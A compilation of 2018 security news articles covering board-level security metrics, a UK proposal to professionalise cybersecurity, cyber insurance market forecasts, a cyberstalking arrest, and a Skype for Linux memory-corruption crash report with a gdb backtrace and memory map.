“Two that we really like to include,” said Miessler, “are firstly, the amount of risk visibility present in the organization (percentage of systems under security management). That is, don’t just report on what you can see, but what percentage of risk isn’t yet visible to you because of technological and time limitations. Secondly, the percentage of systems under management that have x, y, and z level of defenses implemented. These are quite different, as you can have great numbers for the latter while having bad numbers for the former, and risk will still be very high.”

Kellermann proposes “three grades of measurement which are encompassed in the level of risk posed to the information supply chain and operations for a company. These begin with the results from hunt teams to discern if there is a current compromise and what is the scale? Second how quickly can that cybercrime be suppressed and contained? Lastly, are we compliant with the security standards mandated in our industry and our geography. If not, why?”

Like Sahai, Paunet believes the different metrics should be brought together to show the overall security posture of the organization. “It's also helpful to show how the threat landscape and an organization's response is changing over time. This gives the executive team, who may not be cybersecurity experts, some insight into why security is business-critical and worthy of continued investment. CISOs need to distill security insights into something that can be consumed by a non-technical audience that is more interested in the ‘why’ than the ‘what’.”

Meeuwisse warns against being totally insular. “What technology and threat changes are being anticipated or experienced elsewhere in your industry? A dashboard about emerging threats is a great way to check if everything appears to be in hand and if anything needs to be added for consideration.”

But in the final analysis, as Chris Key succinctly says, “The best metrics demonstrate how effective the cybersecurity program is at achieving key business objectives.”

The key takeaways

What is clear from these discussions is that there is no simple answer to what makes good infosec metrics for reporting to business leadership. The detail will vary from industry sector to industry sector, and even company to company, depending on the key business drivers.

It is equally clear infosec must understand business. CISOs cannot expect business leaders to understand security. The purpose of the metrics is to explain how security supports, or could further support, business priorities. To do this, CISOs must understand those business priorities.

The problem here is that such understanding comes best from being a part of the overall business leadership – which rarely happens. In a few enlightened cases, CISOs have at least a voice at the board; but in most cases they still report to the CIO who will have his or her own priorities sometimes at odds with the CISO’s priorities.

Cracking the metrics nut is important. The prize is high – nothing less than more efficient security, a more profitable business, a greater likelihood of gaining budget when it is required, and greater personal visibility at board level. When security is seen to provide protection at the right level and in the important places, it genuinely becomes the enabler of safe business and increased profits rather than a simple drain on corporate funds.

Without good metrics, security and business alignment is unlikely. And without that alignment, security will be patchy and business at risk.


Professionalizing Cybersecurity Practitioners
10.9.2018 securityweek Cyber

The formation of a professional body to provide standards of excellence within cybersecurity practitioners has been mooted for many years. Now the UK government has proposed the development of an institution for “developing the cybersecurity profession, including through achieving Royal Chartered status by 2020.”

This is the professionalization of cybersecurity in everything but name. ‘Regulation’ is not mentioned in the proposal; but just as the General Medical Council regulates medical practitioners, so a potential UK National Cybersecurity Council might eventually regulate cybersecurity practitioners.

This could include setting and requiring cybersecurity qualifications and setting the level of qualifications needed in specific industries. While this will inevitably raise the technical level of many cybersecurity practitioners, it could potentially mean that some practitioners could not be employed by some – if not all – companies without attaining a predefined level of qualifications.

This is not yet the inevitable outcome of the government proposals, which are outlined in a consultation document titled, Developing the Cyber Security Profession in the UK (PDF). The consultation closed August 31, 2018, and the government is currently analyzing feedback.

The proposal

The proposal is that the cybersecurity profession delivers on four specific themes by 2021. These are professional development, professional ethics, thought leadership and influence, and outreach and diversity. Each of these themes is discussed and followed by one or more relevant consultation questions.

Underpinning the proposed role of the National Cybersecurity Council is the CyBOK project – the development of a Cybersecurity Body of Knowledge – being led by Professor Awais Rashid at the university of Bristol. The overall aim of the CyBOK project is to codify the foundational and generally recognized knowledge in cybersecurity.

This project is ongoing. The first phase, completed in October 2017, defines 19 knowledge areas (KAs) of cybersecurity. The government proposal says, “The depiction of the 19 Knowledge Areas sets the scope of cybersecurity to shape approaches for training, standard setting, the dissemination of expert opinion, and the execution of professionalism.”

CyBOK

The 19 KAs of the CyBOK

There is much that is good in the proposals. For example, the government expects to support the development of the professional body, but to then step aside so that it is “fully independent of government.”

However, there is also much that can be criticized. Firstly, it is not a discussion document on what should be done, but one on how to achieve what has already been decided – that is, the formation of a National Cybersecurity Council.

Perhaps even more concerning, however, is that the Council is to be derived from existing organizations rather than individuals. “We envisage,” says the proposal, “the Council would have organizational rather than individual membership and be made up of existing professional bodies and other organizations with an interest in cybersecurity.”

While nobody will deny the great work already undertaken by many of these existing organizations, the fact remains that that they are basically businesses that have sometimes been described as primarily designed to sell certificates.

The lack of direct representation by the very people that are meant to be represented – the individual cybersecurity professionals – could be a worrying development.

Support from existing professional bodies

Existing professional cybersecurity organizations have expressed strong support and have banded together to form an ‘Alliance’ in support of the government’s proposals. The Alliance membership currently comprises BCS, The Chartered Institute for IT, Chartered Institute of Personnel & Development (CIPD), the Chartered Society of Forensic Sciences (CSofFS), CREST, The Engineering Council, IAAC, The Institution of Analysts and Programmers (IAP), The IET, Institute of Information Security Professionals (IISP), Institute of Measurement and Control (InstMC) ISACA, (ISC)2, techUK, The Security Institute, and WCIT, The Worshipful Company of Information Technologists.

A typical expression of support includes, from Deshini Newman, MD EMEA (ISC)2, “We are reaching an important milestone in the maturity of our profession with the intent to develop a nationally-recognized professional body and consideration for chartered status. The UK is taking a leadership role in this effort that may well set an example for governments around the world. We are keen to support their work.”

Michael Hughes, board director of ISACA, adds, “We believe objectives such as the prioritization of benchmarking cyber capabilities and a sharper focus on the need to fortify the pipeline of highly skilled, well-trained cybersecurity professionals put the alliance on track to serve as a valuable resource in support of the UK National Cyber Security Strategy.”

The Chair of the IISP, Dr. Alastair MacWillson, told SecurityWeek, “The IISP has been involved in this initiative from the outset… These discussions have led to the DCMS launching last [July’s] consultation to create a new UK Cyber Security Council to develop the cybersecurity profession in the UK… What is being proposed by the Government through this initiative, is the most profound development of governance for the information security profession that we have seen.”

It is no surprise that existing professional bodies will support the government approach to professionalization – those that don’t will lose ground to those that do. But nowhere in this proposal or support for the proposal, is the voice of the practitioners.

Views from the coalface

The opinions of existing cybersecurity practitioners and individual security consultants range from support through ‘a good but unworkable idea’ to reserved condemnation.

Martin Zinaich (information security officer at the City of Tampa, Florida), has long advocated the formation of a professional body for cybersecurity practitioners able to uphold and maintain professional standards. He wrote a paper on the subject and sees similarities in the UK proposal to his own ideas.

He believes that professionalization is not merely a good idea, but an essential step towards improving the overall quality of cybersecurity. He has some concerns over the involvement of government. He believes a light touch – as suggested in the government proposal – is feasible; but probably not likely. He has always held the view that professionalization is ultimately inevitable, and that if practitioners don’t do it themselves, governments will do it to them.

“The idea,” he told SecurityWeek, “that such critical ubiquitous lifeblood like technology, the internet and IoT will not be regulated heavily, as each new breach expands its impact, is very short sighted. We either lead this effort or get lead.”

The concept of a professional body promoting expertise is widely welcomed; but government involvement is sometimes questioned. “In principle, I think it’s a good idea,” says Paul Simmonds, CEO at The Global Identity Foundation; co-founder of the Jericho Forum. “In fact, when I supported the setting up of the IISP over 10 years ago that's what I hoped they were going to be.”

But he has his own concerns: “Unlike many other professional bodies, security moves an order of magnitude faster, so the worry is that the ‘grandees’ who define the bar for qualification cannot keep up with the speed of change – and we thus continue to implement 1990s-based perimeterized networks.”

Raef Meeuwisse, author of Cybersecurity for Beginners, believes the proposal is a bad idea. “Existing cybersecurity professionals will look at any additional overhead or demands imposed by any national training standards and think; not this. They will vote with their feet and move their skills on to more savvy international employers.”

Meeuwisse believes that top talent rarely bothers with certifications, “not only because their talent speaks for itself but more importantly because training and certification content often lags behind the operational reality by a number of years.”

He fears that rather than levelling cybersecurity professionalism up, a National Cyber Security Council will level down by driving the most able people out of the UK. “Any national registration or requirements,” he told SecurityWeek, “would just act as a deterrent to the best cybersecurity professionals taking up roles in the UK, because the success of the best cybersecurity professionals is built around having a global and international focus.” Rather than solving the cybersecurity problem within the UK, he fears that a national council will simply make it worse.

Meeuwisse is not alone in questioning the absolute need for certifications. Steven Lentz, CSO and director of information security at Samsung Research America, makes a similar point. “There are a lot of security practitioners that do not have security certifications or memberships; but does that mean they do not know their field? They may have been practicing for 10+ years but never had the time to certify. Membership and certification qualities are helpful but depending on the job, job experience is the key.”

Such professionals are well-aware of the existing problems within their industry. One expert, preferring to remain anonymous because he is an ‘official’ in one of the Alliance member organizations, explained, “There are serious problems that remain in the cybersecurity field today, which have existed for a long time. These problems relate to inadequate level of knowledge in security practitioners, lack of measurement performed on activities, and methodologies, poor judgement and decision making in risk management, insufficient communication at many different levels within and between organizations, limited business alignment and limited security assurance provided to stakeholders.”

He believes establishing a cybersecurity profession can help with this, but he has some worries. “The nature of the work we do in managing information risk is very broad, covering disciplines as diverse as strategy, architecture, software development, operations, supply chain risk, incident management, business continuity and assurance. A profession should cover these and other disciplines/practices. Restricting the scope to cybersecurity will likely be too narrow.”

He sees CyBOK itself as problematic. “We need a strong, comprehensive and balanced framework on which to build the profession. I think the contents of the CyBOK, as it currently stands, is problematic for two reasons. Firstly, why would you include capabilities like governance, law, regulation and privacy when they are already covered elsewhere? And secondly, why would you exclude coverage of essential disciplines like psychology, economics, decision theory, social science and statistics, when they are so important to effective cybersecurity?”

The idea that a formal professional body for cybersecurity professionals is a positive and welcome step – but that it has problems – is common. Independent security consultant Stewart Twynham acknowledges that there must be change. “Look at any job ad for a ‘cybersecurity professional’ and you’ll see a long list of must-have training and certifications costing anywhere from £5,000 to £25,000 – along with experience pre-requisites that rule out most candidates. Something has to change… but at the same time we must also be mindful of the rule of unintended consequences.”

He points to the 1986 NHS Project 2000 that was designed to turn nursing into a professional career. “Thirty-two years on and the NHS now faces one of the greatest recruitment crises in its 70-year history amid concerns that nurses are now academics, taught by academics and are no-longer bringing the softer skills into hospitals that the role so desperately requires.”

David Ginsburg, VP of marketing at Cavirin, comments, “The concept of security as an accredited profession is a noble concept. However, it should not be at the risk of interfering with the free market or making it overly difficult for new entrants due to entrenched professional bodies.”

He suggests that the U.S. concept of the ‘professional engineer’ could provide a useful blueprint. “A compromise could be the equivalent of the professional engineer (PE) in the U.S., where individuals are not precluded from utilizing the latest technologies and approaches. In California, we have PEs as diverse as electrical, nuclear, traffic, and chemical; and I could easily see cybersecurity added to the list.”

While most practitioners seem to feel that a professional body is a good idea but with problems and difficulties, there are others more strongly in favor. “Personally, I think it’s a good thing,” Steve Furnell, associate dean and professor of IT security at Plymouth University, told SecurityWeek: “not least because it underlines cybersecurity as being a profession and thereby meriting consideration in its own right, as opposed to being viewed as part of IT, and implying that any qualified IT practitioner might also be suitable to have a stab at security.”

He doesn’t believe it has to be ‘membership by qualification’, but rather by evidence of skills and capability. “Qualifications and certifications are means by which some aspects might be demonstrated,” he continued, “but practitioner experience should count towards the level that can be achieved. Businesses looking to employ staff would, of course, be well-advised to employ people with the right skills, and holding membership of the professional body could prove to be a means of demonstrating this.”

Randy Potts, an information security leader in the Dallas, Texas area, also supports the idea. “At this point, we need all the help we can get, and another council/organization/body might have more success. I do not see this as the final answer, but the new council seems at least focused on clarifying qualifications and career paths, which will aid those looking to enter,” he told SecurityWeek.

“SANS and US government bodies work together on frameworks regularly. I was a fan of the Australian DoD Top 35 too,” he continued. “This seems to be the furtherance of such initiatives. The government working with outside parties is a good way to get multiple perspectives. I think of all the great talent being produced by the Israeli Defense Forces and the startup activity in Tel Aviv as a result.”

CyBOK

The idea of a professional body to raise and maintain cybersecurity standards is good – but there are many concerns over how it may be implemented.

While individual practitioners could voice their opinions during the consultation period of August 2018, they are precluded from being a part of the National Cyber Security Council itself. This implies that the Council will operate as a controlling organization rather than a forum for practitioners.

There is some concern that the existing General Medical Council (GMC) may be the blueprint for the National Cyber Security Council. Qualified medical doctors must be registered with the GMC before they can practice – and there are many examples of doctors being ‘struck off’ for voicing the wrong opinions.

If the GMC is the blueprint, there are also concerns that security product vendors may come to wield too much influence over the GSC, just as there are current concerns that the pharmaceutical companies influence the GMC.

“Influence from drug companies are a problem in the [medical practitioner] space,” is one comment received. “How much of a risk I don’t know but I’ve learnt a lot from Ben Goldacre. For cybersecurity this is a similar risk and will need to be acknowledged and managed.” (Ben Goldacre is author of Bad Pharma: How Drug Companies Mislead Doctors and Harm Patients.)

There is a question over whether the government will be able to fully step aside and leave an established National Cyber Security Council as a fully independent body. Will the government ever be able to let go of control? “No,” says Steven Lentz. “The government thinks it knows all but actually is behind the times in my opinion. Too much politics to really help. The government can maybe have an advisory role but should not run anything.”

“I don't know if government does need to let go,” counters Randy Potts. “If this is effective and successful then I see the government not wanting to let go. If the initiative is a failure, the whole initiative will likely fade away or perhaps never take off.”

The devil will be in the detail going forward. Done correctly, a professional body will benefit the nation, its businesses, and the practitioners. Done badly, it could prove an unmitigated disaster.

“I do think the benefit of an information risk management profession (i.e. beyond just cybersecurity) outweighs the risk, although it will need to be managed. It could even be an opportunity to show how an emerging profession can lead the way and act as a role model for other professions. Is this idealistic? Probably.”

There is one final question worth asking. If the formation of an overarching professional body is such an attractive concept that all the existing professional organizations (the ‘Alliance’) offer such strong support – why did they not come together of their own accord without first requiring the intervention of government?


Cyber Insurance Market to Double by 2020, Says Munich Re
10.9.2018 securityweek Cyber

The market for insurance against cyber threats will double by 2020 to over 8 billion dollars, German reinsurance giant Munich Re told a conference in Monaco on Sunday.

"Cyber risks are one of the biggest threats to the networked economy," Munich Re board member Torsten Jeworrek said in a statement on the first day of an annual meeting of reinsurers in the Mediterranean principality.

Munich Re estimated that companies could more than double their spending on cyber insurance from $3.4-$4 billion (3-3.4 billion euros) in 2017 to $8-$9 billion by 2020.

While the digital economy had increased productivity, "increased networking of machines, and equipment in particular, can also give rise to very complex risks such as data theft, disruptions in the interaction between networked machines, and even the failure of entire production lines and supply chains," Munich Re said, estimating the number of connected devices worldwide will rise from 27 billion to 125 billion by 2030.

"The economic costs of large-scale cyber attacks already exceeds losses caused by natural disasters. Where small and medium-sized enterprises are affected, such attacks can soon threaten their very existence," Munich Re warned.

The most damaging attacks to date, in economic terms, have been caused by malware such as WannaCry and NotPetya, which infected hundreds of thousands of computers around the world in 2017.

The malware encrypted data on hard drives, demanding that users pay ransoms to regain access to the system.

"This trend will continue as more and more machines and devices are connected," Munich Re warned.


Man Charged With Cyberstalking Women for Explicit Photos
6.9.2018 securityweek Cyber

LOS ANGELES (AP) — A former NASA contractor who allegedly threatened to publish nude photos of seven women unless they sent him other explicit pictures has been arrested at his Los Angeles home.

Richard Bauer was arrested Wednesday.

Prosecutors say Bauer contacted some victims through Facebook and got them to reveal information he could use to reset their online passwords. He allegedly got other victims to install computer malware that allowed him to obtain email and website passwords.

Bauer allegedly threatened to post nude photos he'd obtained of the victims online unless they sent more photos.

He's facing 14 federal charges of stalking, unauthorized computer access and identity theft, which carry a possible 64-year sentence.

Bauer worked at NASA's Armstrong Flight Research Center in Southern California.

It's unclear if he has a lawyer.


An untold story of a memory corruption bug in Skype
6.9.2018 securityaffairs Cyber

Security expert discovered that Skype has a malloc(): memory corruption vulnerability that could be triggered while users share some media/file with someone during a call.
Tested on: Linux zero 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux (Ubuntu 18.04 LTS)
Product affected: Skype for linux (skypeforlinux_8.27.0.85_amd64.deb)Steps to reproduce this issue:
1. Open Skype
2. Call anyone
3. During the call try sharing the media or files to the same person
4. The Skype gets crash.
While on a call with one of my colleague, I tried sharing a file which froze my Skype and then it gets crash. However, moving further I tried to debug it with `gdb` and this is what Igot.

$ *** Error in `/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896': malloc(): memory corruption: 0x000000000641ff80 ***
======= Backtrace: =========
/snap/core/current/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fb57d6b97e5]
/snap/core/current/lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7fb57d6c413e]
/snap/core/current/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fb57d6c6184]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(malloc+0x1c)[0x47cc34c]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_malloc+0x19)[0x7fb57ff91719]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(+0x8508d)[0x7fb57ffc708d]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_variant_get_data+0x1f)[0x7fb57ffc72ff]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_variant_get+0xda)[0x7fb57ffc610a]
/usr/lib/x86_64-linux-gnu/gio/modules/libgioremote-volume-monitor.so(+0xc873)[0x7fb57314b873]
/usr/lib/x86_64-linux-gnu/gio/modules/libgioremote-volume-monitor.so(+0x10f2e)[0x7fb57314ff2e]
/usr/lib/x86_64-linux-gnu/gio/modules/libgioremote-volume-monitor.so(+0x11dcb)[0x7fb573150dcb]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(+0x15ad8)[0x7fb5824c3ad8]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_newv+0xd1)[0x7fb5824c4c01]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_new+0x104)[0x7fb5824c5534]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgio-2.0.so.0(g_volume_monitor_get+0x7c)[0x7fb582798ebc]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x25c3d5)[0x7fb583ba53d5]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_type_create_instance+0x1f9)[0x7fb5824e1359]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(+0x1531b)[0x7fb5824c331b]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_newv+0xd1)[0x7fb5824c4c01]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11a75a)[0x7fb583a6375a]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11ce73)[0x7fb583a65e73]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(+0x4d5a3)[0x7fb57ff8f5a3]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_markup_parse_context_parse+0xfc3)[0x7fb57ff90763]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11d8d6)[0x7fb583a668d6]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_builder_extend_with_template+0x1a8)[0x7fb583a61b78]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_widget_init_template+0x107)[0x7fb583cabe07]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x1ae4f1)[0x7fb583af74f1]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_type_create_instance+0x1f9)[0x7fb5824e1359]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(+0x1531b)[0x7fb5824c331b]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_newv+0xd1)[0x7fb5824c4c01]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11a75a)[0x7fb583a6375a]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11bb65)[0x7fb583a64b65]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11d4f1)[0x7fb583a664f1]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(+0x4d6d7)[0x7fb57ff8f6d7]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_markup_parse_context_parse+0xd8e)[0x7fb57ff9052e]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11d8d6)[0x7fb583a668d6]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_builder_extend_with_template+0x1a8)[0x7fb583a61b78]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_widget_init_template+0x107)[0x7fb583cabe07]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x1a773e)[0x7fb583af073e]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_type_create_instance+0x1f9)[0x7fb5824e1359]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(+0x1531b)[0x7fb5824c331b]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_new_valist+0x3b5)[0x7fb5824c51b5]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_new+0xf1)[0x7fb5824c5521]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_file_chooser_dialog_new+0x74)[0x7fb583af1294]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x4e3b90b]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(_ZN11file_dialog14ShowOpenDialogERKNS_14DialogSettingsERKN4base8CallbackIFvbRKSt6vectorINS3_8FilePathESaIS6_EEELNS3_8internal8CopyModeE1ELNSC_10RepeatModeE1EEE+0x2d)[0x4e3be3d]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(_ZN4atom15WebDialogHelper14RunFileChooserEPN7content15RenderFrameHostERKNS1_17FileChooserParamsE+0x33c)[0x4e4d90c]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d8c9b4]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d8c858]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d86c2f]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x2347525]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x48001eb]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47ed9db]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47edcf8]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47ee0d1]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47c4159]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47affc0]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1bfef9e]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1bfed9e]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d65ead]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1e67b93]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1a4c63c]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x19e6d0d]
======= Memory map: ========
000dc000-00200000 rw-p 00000000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
00200000-01802000 r--p 00124000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
01802000-04f35000 r-xp 01726000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
04f35000-04f4b000 rw-p 04e59000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
04f4b000-05818000 rw-p 00000000 00:00 0
06322000-0749a000 rw-p 00000000 00:00 0 [heap]
af8f00000-af8f80000 rw-p 00000000 00:00 0
2a231d00000-2a231d80000 rw-p 00000000 00:00 0
4342f600000-4342f6ab000 rw-p 00000000 00:00 0
4dab7f00000-4dab800a000 rw-p 00000000 00:00 0
5e2b1980000-5e2b1a00000 rw-p 00000000 00:00 0
683f0500000-683f0580000 rw-p 00000000 00:00 0
74c45800000-74c45880000 rw-p 00000000 00:00 0
7f95e280000-7f95e300000 rw-p 00000000 00:00 0
8590f380000-8590f400000 rw-p 00000000 00:00 0
a95ac180000-a95ac200000 rw-p 00000000 00:00 0
b464c9b8000-b464c9c0000 rw-p 00000000 00:00 0
b464c9c0000-b464c9c4000 ---p 00000000 00:00 0
bf52cd00000-bf52cd80000 rw-p 00000000 00:00 0
c191e080000-c191e100000 rw-p 00000000 00:00 0
fe78f400000-fe78f480000 rw-p 00000000 00:00 0
14c588080000-14c588100000 rw-p 00000000 00:00 0
16dfa8300000-16dfa8380000 rw-p 00000000 00:00 0
1b328cb00000-1b328cb80000 rw-p 00000000 00:00 0
1de101180000-1de101200000 rw-p 00000000 00:00 0
1e993f000000-1e993f080000 rw-p 00000000 00:00 0
20c071f00000-20c071f80000 rw-p 00000000 00:00 0
20c61d680000-20c61d700000 rw-p 00000000 00:00 0
2240c1900000-2240c19ab000 rw-p 00000000 00:00 0
22628d700000-22628d780000 rw-p 00000000 00:00 0
25bf77500000-25bf77580000 rw-p 00000000 00:00 0
26ce1a280000-26ce1a300000 rw-p 00000000 00:00 0
26daf9ead000-26daf9f00000 ---p 00000000 00:00 0
26daf9f00000-26daf9f03000 rw-p 00000000 00:00 0
26daf9f03000-26daf9f04000 ---p 00000000 00:00 0
26daf9f04000-26daf9f2d000 rwxp 00000000 00:00 0
26daf9f2d000-26daf9f80000 ---p 00000000 00:00 0
26daf9f80000-26daf9f83000 rw-p 00000000 00:00 0
26daf9f83000-26daf9f84000 ---p 00000000 00:00 0
26daf9f84000-26daf9fad000 rwxp 00000000 00:00 0
26daf9fad000-26dafa000000 ---p 00000000 00:00 0
26dafa000000-26dafa003000 rw-p 00000000 00:00 0
26dafa003000-26dafa004000 ---p 00000000 00:00 0
26dafa004000-26dafa02d000 rwxp 00000000 00:00 0
26dafa02d000-26dafa080000 ---p 00000000 00:00 0
26dafa080000-26dafa083000 rw-p 00000000 00:00 0
26dafa083000-26dafa084000 ---p 00000000 00:00 0
26dafa084000-26dafa0ff000 rwxp 00000000 00:00 0
26dafa0ff000-26dafa100000 ---p 00000000 00:00 0
26dafa100000-26dafa103000 rw-p 00000000 00:00 0
26dafa103000-26dafa104000 ---p 00000000 00:00 0
26dafa104000-26dafa17f000 rwxp 00000000 00:00 0
26dafa17f000-26dafa180000 ---p 00000000 00:00 0
26dafa180000-26dafa183000 rw-p 00000000 00:00 0
26dafa183000-26dafa184000 ---p 00000000 00:00 0
26dafa184000-26dafa1ff000 rwxp 00000000 00:00 0
26dafa1ff000-26dafa200000 ---p 00000000 00:00 0
26dafa200000-26dafa203000 rw-p 00000000 00:00 0
26dafa203000-26dafa204000 ---p 00000000 00:00 0
26dafa204000-26dafa27f000 rwxp 00000000 00:00 0
26dafa27f000-26db19ead000 ---p 00000000 00:00 0
2adf28e80000-2adf28f00000 rw-p 00000000 00:00 0
2b4467900000-2b4467980000 rw-p 00000000 00:00 0
2bb8adb80000-2bb8adc00000 rw-p 00000000 00:00 0
2dadb8480000-2dadb8500000 rw-p 00000000 00:00 0
2fa869080000-2fa869100000 rw-p 00000000 00:00 0
325d21200000-325d21280000 rw-p 00000000 00:00 0
3462c4b00000-3462c4b80000 rw-p 00000000 00:00 0
34a98af80000-34a98b000000 rw-p 00000000 00:00 0
34efe4300000-34efe4380000 rw-p 00000000 00:00 0
355999380000-355999400000 rw-p 00000000 00:00 0
35c8d9680000-35c8d9685000 rw-p 00000000 00:00 0
36fd03c00000-36fd03c80000 rw-p 00000000 00:00 0
371ab4200000-371ab4280000 rw-p 00000000 00:00 0
37e430000000-37e430080000 rw-p 00000000 00:00 0
37f3b2f00000-37f3b2f80000 rw-p 00000000 00:00 0
389966a80000-389966b8a000 rw-p 00000000 00:00 0
3ad500400000-3ad500480000 rw-p 00000000 00:00 0
3aff91d80000-3aff91de2000 rw-p 00000000 00:00 0
3b2f0d680000-3b2f0d700000 rw-p 00000000 00:00 0
3fba22080000-3fba22100000 rw-p 00000000 00:00 0
7fb4bfffc000-7fb4c3ffd000 rw-s 00000000 00:1a 116 /dev/shm/pulse-shm-3506809168
7fb4c3ffd000-7fb4c7ffe000 rw-s 00000000 00:1a 115 /dev/shm/pulse-shm-136900218
7fb4c7ffe000-7fb4cbfff000 rw-s 00000000 00:1a 95 /dev/shm/pulse-shm-1835135660
7fb4cbfff000-7fb4d0000000 rw-s 00000000 00:1a 93 /dev/shm/pulse-shm-465478744
7fb4d0000000-7fb4d0029000 rw-p 00000000 00:00 0
7fb4d0029000-7fb4d4000000 ---p 00000000 00:00 0
7fb4d615e000-7fb4d615f000 ---p 00000000 00:00 0
7fb4d615f000-7fb4d695f000 rw-p 00000000 00:00 0
